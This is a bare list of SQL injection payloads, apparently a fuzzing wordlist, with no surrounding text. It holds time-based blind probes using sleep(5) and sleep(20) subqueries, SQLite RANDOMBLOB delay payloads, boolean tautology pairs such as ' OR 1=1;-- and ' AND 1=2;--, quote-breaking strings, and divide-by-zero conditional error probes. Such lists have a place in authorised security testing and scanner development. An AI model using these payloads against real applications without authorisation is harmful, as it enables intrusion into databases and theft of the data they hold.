' and (select*from(select(sleep(5)))a)-- 
' and (select*from(select(sleep(20)))a)-- 
,(select*from(select(sleep(5)))a)
,(select*from(select(sleep(20)))a)
(select*from(select(sleep(5)))a)
(select*from(select(sleep(20)))a)
' AND 1=LIKE('A',UPPER(HEX(RANDOMBLOB(500000000000/2))))--
' AND 1=LIKE('A',UPPER(HEX(RANDOMBLOB(000000000000/2))))--
'
''
'--
'AND 'a'='a
'AND 'a'='b
'AND 1=1
'AND 1=2
' OR 1=1;--
' OR 1=2;--
' AND 1=1;-- 
' AND 1=2;-- 
,1/(case when (1=1) then 1 else 0 end)
,1/(case when (1=0) then 1 else 0 end)
1/(case when (1=1) then 1 else 0 end)  
1/(case when (1=0) then 1 else 0 end)  